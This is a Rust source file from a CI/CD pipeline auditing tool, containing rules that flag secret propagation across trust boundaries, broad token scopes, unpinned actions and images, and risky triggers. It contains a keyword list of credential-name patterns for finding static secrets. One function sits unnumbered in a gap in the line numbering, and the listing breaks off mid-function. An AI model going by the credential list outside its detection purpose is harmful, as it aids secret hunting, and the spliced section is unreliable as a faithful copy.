Skip to main content

taudit_core/
rules.rs

1use crate::finding::{
2    Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
3};
4use crate::graph::{
5    is_docker_digest_pinned, is_pin_semantically_valid, AuthorityGraph, EdgeKind, IdentityScope,
6    NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
7    META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
8    META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
9    META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
10    META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
11    META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
12    META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
13    META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
14    META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
15    META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
16    META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
17    META_WORKSPACE_CLEAN, META_WRITES_ENV_GATE,
18};
19use crate::propagation;
20
21/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
22///
23/// **Clustering (v0.9.x):** all paths from the same root authority node
24/// (Secret/Identity) collapse into ONE finding per source. The single
25/// finding carries every reached sink in `nodes_involved` — `[source,
26/// sink_a, sink_b, ...]` — and lists them in the message. This matches
27/// the SARIF fingerprint behaviour (which already collapses per
28/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
29/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
30/// identical findings as it propagated through a matrix workflow.
31///
32/// Severity graduation (per-path, then max-over-paths):
33/// - Untrusted sink: Critical (real risk — unpinned code with authority)
34/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
35/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
36///   token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
37///
38/// When every path in a cluster crosses an environment approval gate,
39/// the cluster's severity is downgraded one step (mirroring the
40/// per-path downgrade the previous emitter applied).
41pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
42    let paths = propagation::propagation_analysis(graph, max_hops);
43
44    // Group by root authority source node. We preserve insertion order so
45    // findings come out in the same order they would have under per-hop
46    // emission (callers and golden-file tests rely on the source-first
47    // ordering of authority_propagation findings).
48    let mut order: Vec<NodeId> = Vec::new();
49    let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
50        std::collections::HashMap::new();
51
52    for path in paths.into_iter().filter(|p| p.crossed_boundary) {
53        groups
54            .entry(path.source)
55            .or_insert_with(|| {
56                order.push(path.source);
57                Vec::new()
58            })
59            .push(path);
60    }
61
62    let mut findings = Vec::with_capacity(order.len());
63
64    for source_id in order {
65        let paths = match groups.remove(&source_id) {
66            Some(p) if !p.is_empty() => p,
67            _ => continue,
68        };
69
70        let source_name = graph
71            .node(source_id)
72            .map(|n| n.name.as_str())
73            .unwrap_or("?")
74            .to_string();
75        let source_is_constrained = graph
76            .node(source_id)
77            .and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
78            .map(|s| s == "constrained")
79            .unwrap_or(false);
80        let source_is_oidc = graph
81            .node(source_id)
82            .and_then(|n| n.metadata.get(META_OIDC))
83            .map(|v| v == "true")
84            .unwrap_or(false);
85
86        // Walk every path in the cluster and compute (severity, gated?,
87        // sink id, representative path) — the cluster takes the max
88        // severity (i.e. the worst sink wins). Severity is downgraded
89        // only when every path in the cluster crosses an env-approval
90        // gate; if even one path bypasses the gate, the cluster is not
91        // downgraded.
92        let mut worst_sev = Severity::Info;
93        let mut all_gated = true;
94        let mut best_path: Option<propagation::PropagationPath> = None;
95        let mut sink_ids: Vec<NodeId> = Vec::new();
96        let mut seen_sinks = std::collections::HashSet::new();
97
98        for path in &paths {
99            let sink_is_pinned = graph
100                .node(path.sink)
101                .map(|n| {
102                    n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
103                })
104                .unwrap_or(false);
105
106            let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
107                Severity::Medium
108            } else if sink_is_pinned && !source_is_oidc {
109                Severity::High
110            } else {
111                Severity::Critical
112            };
113
114            let gated = path_crosses_env_approval(graph, path);
115            let effective_severity = if gated {
116                downgrade_one_step(base_severity)
117            } else {
118                base_severity
119            };
120
121            if !gated {
122                all_gated = false;
123            }
124
125            if effective_severity < worst_sev {
126                worst_sev = effective_severity;
127                best_path = Some(path.clone());
128            }
129
130            if seen_sinks.insert(path.sink) {
131                sink_ids.push(path.sink);
132            }
133        }
134
135        // Build sink name list for the message. Truncate aggressively past
136        // ~5 names to avoid an unbounded message string on extreme inputs;
137        // the full set is still in `nodes_involved`.
138        let mut sink_names: Vec<String> = sink_ids
139            .iter()
140            .filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
141            .collect();
142        let truncated = if sink_names.len() > 5 {
143            let extra = sink_names.len() - 5;
144            sink_names.truncate(5);
145            format!(", …+{extra} more")
146        } else {
147            String::new()
148        };
149        let sink_list = sink_names.join(", ");
150
151        let suffix = if all_gated && !paths.is_empty() {
152            " (mitigated: environment approval gate)"
153        } else {
154            ""
155        };
156
157        let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
158        nodes_involved.push(source_id);
159        nodes_involved.extend(sink_ids.iter().copied());
160
161        let n = paths.len();
162        let unique_sinks = sink_ids.len();
163        let message = if unique_sinks == 1 {
164            format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
165        } else {
166            format!(
167                "{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
168            )
169        };
170
171        let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
172
173        findings.push(Finding {
174            severity: worst_sev,
175            category: FindingCategory::AuthorityPropagation,
176            nodes_involved,
177            message,
178            recommendation: Recommendation::TsafeRemediation {
179                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
180                explanation: format!("Scope {source_name} to only the steps that need it"),
181            },
182            path: best_path,
183            source: FindingSource::BuiltIn,
184            extras: FindingExtras::default(),
185        });
186    }
187
188    findings
189}
190
191/// Returns true if any node touched by `path` (source, sink, or any edge
192/// endpoint along the way) carries META_ENV_APPROVAL = "true".
193fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
194    let has_marker = |id: NodeId| {
195        graph
196            .node(id)
197            .and_then(|n| n.metadata.get(META_ENV_APPROVAL))
198            .map(|v| v == "true")
199            .unwrap_or(false)
200    };
201
202    if has_marker(path.source) || has_marker(path.sink) {
203        return true;
204    }
205
206    for &edge_id in &path.edges {
207        if let Some(edge) = graph.edge(edge_id) {
208            if has_marker(edge.from) || has_marker(edge.to) {
209                return true;
210            }
211        }
212    }
213    false
214}
215
216/// Reduce a severity by one step. Critical→High, High→Medium, Medium→Low.
217/// Low and Info are already at the floor of meaningful reduction and are
218/// returned unchanged.
219fn downgrade_one_step(severity: Severity) -> Severity {
220    match severity {
221        Severity::Critical => Severity::High,
222        Severity::High => Severity::Medium,
223        Severity::Medium => Severity::Low,
224        Severity::Low => Severity::Low,
225        Severity::Info => Severity::Info,
226    }
227}
228
229/// MVP Rule 2: Identity scope broader than actual usage.
230///
231/// Uses `IdentityScope` classification from the precision layer. Broad and
232/// Unknown scopes are flagged — Unknown is treated as risky because if we
233/// can't determine the scope, we shouldn't assume it's safe.
234pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
235    let mut findings = Vec::new();
236
237    for identity in graph.nodes_of_kind(NodeKind::Identity) {
238        let granted_scope = identity
239            .metadata
240            .get(META_PERMISSIONS)
241            .cloned()
242            .unwrap_or_default();
243
244        // Use IdentityScope from metadata if set by parser, otherwise classify from permissions
245        let scope = identity
246            .metadata
247            .get(META_IDENTITY_SCOPE)
248            .and_then(|s| match s.as_str() {
249                "broad" => Some(IdentityScope::Broad),
250                "constrained" => Some(IdentityScope::Constrained),
251                "unknown" => Some(IdentityScope::Unknown),
252                _ => None,
253            })
254            .unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
255
256        // Broad or Unknown scope — flag it. Unknown is treated as risky.
257        let (should_flag, severity) = match scope {
258            IdentityScope::Broad => (true, Severity::High),
259            IdentityScope::Unknown => (true, Severity::Medium),
260            IdentityScope::Constrained => (false, Severity::Info),
261        };
262
263        if !should_flag {
264            continue;
265        }
266
267        let accessor_steps: Vec<_> = graph
268            .edges_to(identity.id)
269            .filter(|e| e.kind == EdgeKind::HasAccessTo)
270            .filter_map(|e| graph.node(e.from))
271            .collect();
272
273        if !accessor_steps.is_empty() {
274            let scope_label = match scope {
275                IdentityScope::Broad => "broad",
276                IdentityScope::Unknown => "unknown (treat as risky)",
277                IdentityScope::Constrained => "constrained",
278            };
279
280            // Service connections are ADO-portal-configured identities; their
281            // scope is not governed by the pipeline-level `permissions:` YAML
282            // block. Emit a distinct message and recommendation so users aren't
283            // confused into thinking adding `permissions: contents: none` will
284            // fix this finding.
285            let is_service_connection = identity
286                .metadata
287                .get(META_SERVICE_CONNECTION)
288                .map(|v| v == "true")
289                .unwrap_or(false);
290
291            let (message, recommendation) = if is_service_connection {
292                (
293                    format!(
294                        "Service connection '{}' has {} scope — \
295                         scope is controlled in the ADO portal, not by the pipeline \
296                         permissions: YAML block",
297                        identity.name, scope_label
298                    ),
299                    Recommendation::Manual {
300                        action: format!(
301                            "Narrow '{}' in ADO Project Settings → Service Connections → \
302                             Security, or replace static credentials with workload identity \
303                             federation (OIDC) so no long-lived secret is stored.",
304                            identity.name
305                        ),
306                    },
307                )
308            } else {
309                (
310                    format!(
311                        "{} has {} scope (permissions: '{}') — likely broader than needed",
312                        identity.name, scope_label, granted_scope
313                    ),
314                    Recommendation::ReducePermissions {
315                        current: granted_scope.clone(),
316                        minimum: "{ contents: read }".into(),
317                    },
318                )
319            };
320
321            findings.push(Finding {
322                severity,
323                category: FindingCategory::OverPrivilegedIdentity,
324                path: None,
325                nodes_involved: std::iter::once(identity.id)
326                    .chain(accessor_steps.iter().map(|n| n.id))
327                    .collect(),
328                message,
329                recommendation,
330                source: FindingSource::BuiltIn,
331                // Working out the minimum-needed scope across N jobs is a
332                // ~1 hour audit, not a flag flip — Small.
333                extras: FindingExtras {
334                    time_to_fix: Some(crate::finding::FixEffort::Small),
335                    ..FindingExtras::default()
336                },
337            });
338        }
339    }
340
341    findings
342}
343
344/// MVP Rule 3: Third-party action/image without SHA pin.
345///
346/// **Severity tiering (v0.9.x):** the rule used to fire at a single severity
347/// regardless of which action was unpinned, which produced uniform noise on
348/// monorepo CI files where the action owner determined the actual risk.
349/// The blue-team corpus report (`MEMORY/.../blueteam-corpus-defense.md`)
350/// recommended splitting:
351///   * Same-repo composite action (`./.github/actions/*`) → **Info**.
352///     The action lives in the consumer's own repo — there's no external
353///     supply-chain surface; pinning is a hygiene preference, not a
354///     control gap.
355///   * Owner is a well-known first-party org (`actions/*`, `github/*`,
356///     `actions-rs/*`, `docker/*`) → **Medium**. These are GitHub-org or
357///     adjacent tooling maintainers; the supply-chain surface exists but
358///     is operationally narrow and well-monitored.
359///   * Anything else (`random-org/foo@v1`, etc.) → **High**. Unbounded
360///     supply-chain risk — this is the case the rule was originally
361///     designed for.
362///
363/// Deduplicates by action reference — the same action used in multiple jobs
364/// produces multiple Image nodes but should only be flagged once.
365pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
366    let mut findings = Vec::new();
367    let mut seen = std::collections::HashSet::new();
368
369    for image in graph.nodes_of_kind(NodeKind::Image) {
370        // Container images are handled by floating_image — skip here to avoid
371        // double-flagging the same node as both UnpinnedAction and FloatingImage.
372        if image
373            .metadata
374            .get(META_CONTAINER)
375            .map(|v| v == "true")
376            .unwrap_or(false)
377        {
378            continue;
379        }
380
381        // Self-hosted runner labels live in the FirstParty zone but aren't
382        // an action reference — they have no `@version` to pin and the rule
383        // would otherwise flag every `runs-on: self-hosted` line.
384        if image
385            .metadata
386            .get(META_SELF_HOSTED)
387            .map(|v| v == "true")
388            .unwrap_or(false)
389        {
390            continue;
391        }
392
393        // Same-repo composite actions (`./.github/actions/foo`) sit in the
394        // FirstParty zone. Other FirstParty Image nodes (e.g. self-hosted
395        // pool labels, hosted runner names) are not flaggable references —
396        // we admit FirstParty into the severity ladder ONLY when the name
397        // is the relative-path form, and emit Info for it.
398        let is_local_composite = image.name.starts_with("./");
399        if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
400            continue;
401        }
402
403        // Deduplicate: same action reference flagged once
404        if !seen.insert(&image.name) {
405            continue;
406        }
407
408        let has_digest = image.metadata.contains_key(META_DIGEST);
409
410        if has_digest || is_pin_semantically_valid(&image.name) {
411            continue;
412        }
413
414        // Tier severity by owner. `is_local_composite` already handled the
415        // same-repo case; for everything else, look at the `<owner>/...`
416        // prefix and decide first-party vs unknown supplier.
417        let severity = if is_local_composite {
418            Severity::Info
419        } else if is_well_known_first_party_action(&image.name) {
420            Severity::Medium
421        } else {
422            Severity::High
423        };
424
425        findings.push(Finding {
426            severity,
427            category: FindingCategory::UnpinnedAction,
428            path: None,
429            nodes_involved: vec![image.id],
430            message: format!("{} is not pinned to a SHA digest", image.name),
431            recommendation: Recommendation::PinAction {
432                current: image.name.clone(),
433                pinned: format!(
434                    "{}@<sha256-digest>",
435                    image.name.split('@').next().unwrap_or(&image.name)
436                ),
437            },
438            source: FindingSource::BuiltIn,
439            // Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
440            extras: FindingExtras {
441                time_to_fix: Some(crate::finding::FixEffort::Trivial),
442                ..FindingExtras::default()
443            },
444        });
445    }
446
447    findings
448}
449
/// Returns `true` when the owner segment of an action reference belongs to
/// the short allow-list of well-known first-party owners (`actions`,
/// `github`, `actions-rs`, `docker`).
///
/// The owner is whatever precedes the first `/` once an optional `@<ref>`
/// suffix has been removed, so `actions/checkout@v4` yields `actions` and
/// `./.github/actions/foo` yields `.`.
///
/// The comparison ignores ASCII case: GitHub resolves owner names
/// case-insensitively, so `Actions/checkout@v4` is the same action as
/// `actions/checkout@v4` and must land in the same severity tier.
///
/// The list is deliberately small — every owner added here lowers the
/// severity of all unpinned actions that owner ships.
fn is_well_known_first_party_action(uses: &str) -> bool {
    const WELL_KNOWN_OWNERS: [&str; 4] = ["actions", "github", "actions-rs", "docker"];

    // Strip an optional `@<ref>` suffix, then take the leading owner segment.
    let bare = uses.split('@').next().unwrap_or(uses);
    let owner = bare.split('/').next().unwrap_or("");

    WELL_KNOWN_OWNERS
        .iter()
        .any(|known| owner.eq_ignore_ascii_case(known))
}
461
462/// MVP Rule 4: Untrusted step has direct access to secret/identity.
463pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
464    let mut findings = Vec::new();
465
466    for step in graph.nodes_in_zone(TrustZone::Untrusted) {
467        if step.kind != NodeKind::Step {
468            continue;
469        }
470
471        // Check if this untrusted step directly accesses any authority source
472        for edge in graph.edges_from(step.id) {
473            if edge.kind != EdgeKind::HasAccessTo {
474                continue;
475            }
476
477            if let Some(target) = graph.node(edge.to) {
478                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
479                    let cli_flag_exposed = target
480                        .metadata
481                        .get(META_CLI_FLAG_EXPOSED)
482                        .map(|v| v == "true")
483                        .unwrap_or(false);
484
485                    // Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
486                    // accessible to all tasks by design. Flag at Info — real but not actionable
487                    // as a misconfiguration. Explicit secrets/service connections stay Critical.
488                    let is_implicit = target
489                        .metadata
490                        .get(META_IMPLICIT)
491                        .map(|v| v == "true")
492                        .unwrap_or(false);
493
494                    let recommendation = if target.kind == NodeKind::Secret {
495                        if cli_flag_exposed {
496                            Recommendation::Manual {
497                                action: format!(
498                                    "Move '{}' from -var flag to TF_VAR_{} env var — \
499                                     -var values appear in pipeline logs and Terraform plan output",
500                                    target.name, target.name
501                                ),
502                            }
503                        } else {
504                            Recommendation::CellosRemediation {
505                                reason: format!(
506                                    "Untrusted step '{}' has direct access to secret '{}'",
507                                    step.name, target.name
508                                ),
509                                spec_hint: format!(
510                                    "cellos run --network deny-all --broker env:{}",
511                                    target.name
512                                ),
513                            }
514                        }
515                    } else {
516                        // Identity branch — for implicit platform tokens, add a CellOS
517                        // compensating-control note since the token cannot be un-injected
518                        // at the platform layer.
519                        let minimum = if is_implicit {
520                            "minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
521                        } else {
522                            "minimal required scope".into()
523                        };
524                        Recommendation::ReducePermissions {
525                            current: target
526                                .metadata
527                                .get(META_PERMISSIONS)
528                                .cloned()
529                                .unwrap_or_else(|| "unknown".into()),
530                            minimum,
531                        }
532                    };
533
534                    let log_exposure_note = if cli_flag_exposed {
535                        " (passed as -var flag — value visible in pipeline logs)"
536                    } else {
537                        ""
538                    };
539
540                    let (severity, message) =
541                        if is_implicit {
542                            (
543                                Severity::Info,
544                                format!(
545                                "Untrusted step '{}' has structural access to implicit {} '{}' \
546                                 (platform-injected — all tasks receive this token by design){}",
547                                step.name,
548                                if target.kind == NodeKind::Secret { "secret" } else { "identity" },
549                                target.name,
550                                log_exposure_note,
551                            ),
552                            )
553                        } else {
554                            (
555                                Severity::Critical,
556                                format!(
557                                    "Untrusted step '{}' has direct access to {} '{}'{}",
558                                    step.name,
559                                    if target.kind == NodeKind::Secret {
560                                        "secret"
561                                    } else {
562                                        "identity"
563                                    },
564                                    target.name,
565                                    log_exposure_note,
566                                ),
567                            )
568                        };
569
570                    findings.push(Finding {
571                        severity,
572                        category: FindingCategory::UntrustedWithAuthority,
573                        path: None,
574                        nodes_involved: vec![step.id, target.id],
575                        message,
576                        recommendation,
577                        source: FindingSource::BuiltIn,
578                        extras: FindingExtras::default(),
579                    });
580                }
581            }
582        }
583    }
584
585    findings
586}
587
588/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
589pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
590    let mut findings = Vec::new();
591
592    for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
593        // Find producer(s)
594        let producers: Vec<_> = graph
595            .edges_to(artifact.id)
596            .filter(|e| e.kind == EdgeKind::Produces)
597            .filter_map(|e| graph.node(e.from))
598            .collect();
599
600        // Find consumer(s) — Consumes edges go artifact -> step
601        let consumers: Vec<_> = graph
602            .edges_from(artifact.id)
603            .filter(|e| e.kind == EdgeKind::Consumes)
604            .filter_map(|e| graph.node(e.to))
605            .collect();
606
607        for producer in &producers {
608            for consumer in &consumers {
609                // Skip intra-job pairs: upload → download within the same job
610                // is a legitimate temp-file pattern. The trust crossing is only
611                // meaningful when the artifact crosses a job boundary.
612                let prod_job = producer
613                    .metadata
614                    .get(META_JOB_NAME)
615                    .map(String::as_str)
616                    .unwrap_or("");
617                let cons_job = consumer
618                    .metadata
619                    .get(META_JOB_NAME)
620                    .map(String::as_str)
621                    .unwrap_or("");
622                if !prod_job.is_empty() && prod_job == cons_job {
623                    continue;
624                }
625
626                if producer.trust_zone.is_lower_than(&consumer.trust_zone) {
627                    findings.push(Finding {
628                        severity: Severity::High,
629                        category: FindingCategory::ArtifactBoundaryCrossing,
630                        path: None,
631                        nodes_involved: vec![producer.id, artifact.id, consumer.id],
632                        message: format!(
633                            "Untrusted artifact '{}' produced by '{}' ({:?}) consumed by privileged step '{}' ({:?})",
634                            artifact.name,
635                            producer.name,
636                            producer.trust_zone,
637                            consumer.name,
638                            consumer.trust_zone
639                        ),
640                        recommendation: Recommendation::Manual {
641                            action: "Ensure the artifact producer runs in a trusted job; restrict which jobs can consume the artifact using platform-specific controls (e.g. environment protection rules, manual approval gates).".into(),
642                        },
643                        source: FindingSource::BuiltIn,
644                        extras: FindingExtras::default(),
645                    });
646                }
647            }
648        }
649    }
650
651    findings
652}
653
654/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
655///
656/// Heuristic: secrets named like AWS keys, API keys, passwords, or private keys
657/// are likely static credentials that should be replaced with OIDC federation.
658pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
659    const STATIC_PATTERNS: &[&str] = &[
660        "AWS_ACCESS_KEY",
661        "AWS_SECRET_ACCESS_KEY",
662        "_API_KEY",
663        "_APIKEY",
664        "_PASSWORD",
665        "_PASSWD",
666        "_PRIVATE_KEY",
667        "_SECRET_KEY",
668        "_SERVICE_ACCOUNT",
669        "_SIGNING_KEY",
670    ];
671
672    let mut findings = Vec::new();
673
674    for secret in graph.nodes_of_kind(NodeKind::Secret) {
675        let upper = secret.name.to_uppercase();
676        let is_static = STATIC_PATTERNS.iter().any(|p| upper.contains(p));
677
678        if is_static {
679            findings.push(Finding {
680                severity: Severity::Low,
681                category: FindingCategory::LongLivedCredential,
682                path: None,
683                nodes_involved: vec![secret.id],
684                message: format!(
685                    "'{}' looks like a long-lived static credential",
686                    secret.name
687                ),
688                recommendation: Recommendation::FederateIdentity {
689                    static_secret: secret.name.clone(),
690                    oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
691                },
692                source: FindingSource::BuiltIn,
693                // Migrating from PATs to OIDC across an org touches identity
694                // policy, IAM trust relationships, and every downstream
695                // consumer of the credential — Large effort.
696                extras: FindingExtras {
697                    time_to_fix: Some(crate::finding::FixEffort::Large),
698                    ..FindingExtras::default()
699                },
700            });
701        }
702    }
703
704    findings
705}
706
707/// Tier 6 Rule: Container image without Docker digest pinning.
708///
709/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
710/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
711/// by image name (same image in multiple jobs flags once).
712pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
713    let mut findings = Vec::new();
714    let mut seen = std::collections::HashSet::new();
715
716    for image in graph.nodes_of_kind(NodeKind::Image) {
717        let is_container = image
718            .metadata
719            .get(META_CONTAINER)
720            .map(|v| v == "true")
721            .unwrap_or(false);
722
723        if !is_container {
724            continue;
725        }
726
727        if !seen.insert(image.name.as_str()) {
728            continue;
729        }
730
731        if !is_docker_digest_pinned(&image.name) {
732            findings.push(Finding {
733                severity: Severity::Medium,
734                category: FindingCategory::FloatingImage,
735                path: None,
736                nodes_involved: vec![image.id],
737                message: format!("Container image '{}' is not pinned to a digest", image.name),
738                recommendation: Recommendation::PinAction {
739                    current: image.name.clone(),
740                    pinned: format!(
741                        "{}@sha256:<digest>",
742                        image.name.split(':').next().unwrap_or(&image.name)
743                    ),
744                },
745                source: FindingSource::BuiltIn,
746                // `docker pull <image>` once and append `@sha256:<digest>` —
747                // identical mechanical fix to unpinned_action. Trivial.
748                extras: FindingExtras {
749                    time_to_fix: Some(crate::finding::FixEffort::Trivial),
750                    ..FindingExtras::default()
751                },
752            });
753        }
754    }
755
756    findings
757}
758
759/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
760///
761/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
762/// credentials are accessible to all subsequent steps (and to any process with filesystem
763/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
764pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
765    let mut findings = Vec::new();
766
767    for edge in &graph.edges {
768        if edge.kind != EdgeKind::PersistsTo {
769            continue;
770        }
771
772        let Some(step) = graph.node(edge.from) else {
773            continue;
774        };
775        let Some(target) = graph.node(edge.to) else {
776            continue;
777        };
778
779        findings.push(Finding {
780            severity: Severity::High,
781            category: FindingCategory::PersistedCredential,
782            path: None,
783            nodes_involved: vec![step.id, target.id],
784            message: format!(
785                "'{}' persists '{}' to disk via persistCredentials: true — \
786                 credential remains in .git/config and is accessible to all subsequent steps",
787                step.name, target.name
788            ),
789            recommendation: Recommendation::Manual {
790                action: "Remove persistCredentials: true from the checkout step. \
791                         Pass credentials explicitly only to steps that need them."
792                    .into(),
793            },
794            source: FindingSource::BuiltIn,
795            extras: FindingExtras::default(),
796        });
797    }
798
799    findings
800}
801
802/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
803///
804/// Fires once per workflow when the graph-level `META_TRIGGER` indicates a high-risk
805/// trigger and at least one step holds authority. Aggregates all involved nodes.
806pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
807    let trigger = match graph.metadata.get(META_TRIGGER) {
808        Some(t) => t.clone(),
809        None => return Vec::new(),
810    };
811
812    let severity = match trigger.as_str() {
813        "pull_request_target" => Severity::Critical,
814        "pr" => Severity::High,
815        _ => return Vec::new(),
816    };
817
818    // Collect steps that hold authority (HasAccessTo a Secret or Identity)
819    let mut steps_with_authority: Vec<NodeId> = Vec::new();
820    let mut authority_targets: Vec<NodeId> = Vec::new();
821
822    for step in graph.nodes_of_kind(NodeKind::Step) {
823        let mut step_holds_authority = false;
824        for edge in graph.edges_from(step.id) {
825            if edge.kind != EdgeKind::HasAccessTo {
826                continue;
827            }
828            if let Some(target) = graph.node(edge.to) {
829                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
830                    step_holds_authority = true;
831                    if !authority_targets.contains(&target.id) {
832                        authority_targets.push(target.id);
833                    }
834                }
835            }
836        }
837        if step_holds_authority {
838            steps_with_authority.push(step.id);
839        }
840    }
841
842    if steps_with_authority.is_empty() {
843        return Vec::new();
844    }
845
846    let n = steps_with_authority.len();
847    let mut nodes_involved = steps_with_authority.clone();
848    nodes_involved.extend(authority_targets);
849
850    vec![Finding {
851        severity,
852        category: FindingCategory::TriggerContextMismatch,
853        path: None,
854        nodes_involved,
855        message: format!(
856            "Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
857        ),
858        recommendation: Recommendation::Manual {
859            action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
860        },
861        source: FindingSource::BuiltIn,
862        extras: FindingExtras::default(),
863}]
864}
865
866/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
867///
868/// For each Step node: find all `DelegatesTo` edges to Image nodes where the trust zone
869/// is not FirstParty. If the same step also has `HasAccessTo` any Secret or Identity,
870/// emit one finding per delegation edge.
871pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
872    let mut findings = Vec::new();
873
874    for step in graph.nodes_of_kind(NodeKind::Step) {
875        // Collect authority sources this step holds
876        let authority_nodes: Vec<&_> = graph
877            .edges_from(step.id)
878            .filter(|e| e.kind == EdgeKind::HasAccessTo)
879            .filter_map(|e| graph.node(e.to))
880            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
881            .collect();
882
883        if authority_nodes.is_empty() {
884            continue;
885        }
886
887        // Find each DelegatesTo edge to a non-FirstParty Image
888        for edge in graph.edges_from(step.id) {
889            if edge.kind != EdgeKind::DelegatesTo {
890                continue;
891            }
892            let Some(target) = graph.node(edge.to) else {
893                continue;
894            };
895            if target.kind != NodeKind::Image {
896                continue;
897            }
898            if target.trust_zone == TrustZone::FirstParty {
899                continue;
900            }
901
902            let severity = match target.trust_zone {
903                TrustZone::Untrusted => Severity::Critical,
904                TrustZone::ThirdParty => Severity::High,
905                TrustZone::FirstParty => continue,
906            };
907
908            let authority_names: Vec<String> =
909                authority_nodes.iter().map(|n| n.name.clone()).collect();
910            let authority_label = authority_names.join(", ");
911
912            let mut nodes_involved = vec![step.id, target.id];
913            nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
914
915            findings.push(Finding {
916                severity,
917                category: FindingCategory::CrossWorkflowAuthorityChain,
918                path: None,
919                nodes_involved,
920                message: format!(
921                    "'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
922                    step.name, target.name, target.trust_zone, authority_label
923                ),
924                recommendation: Recommendation::Manual {
925                    action: format!(
926                        "Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
927                        target.name
928                    ),
929                },
930                source: FindingSource::BuiltIn,
931                        extras: FindingExtras::default(),
932});
933        }
934    }
935
936    findings
937}
938
939/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
940///
941/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
942/// collects all nodes that participate in any cycle. If any cycles exist, emits
943/// a single High-severity finding listing all cycle members.
944pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
945    let n = graph.nodes.len();
946    if n == 0 {
947        return Vec::new();
948    }
949
950    // Pre-build adjacency list for DelegatesTo edges only.
951    let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
952    for edge in &graph.edges {
953        if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
954            delegates_to[edge.from].push(edge.to);
955        }
956    }
957
958    let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
959    let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
960
961    for start in 0..n {
962        if color[start] != 0 {
963            continue;
964        }
965        color[start] = 1;
966        let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
967
968        loop {
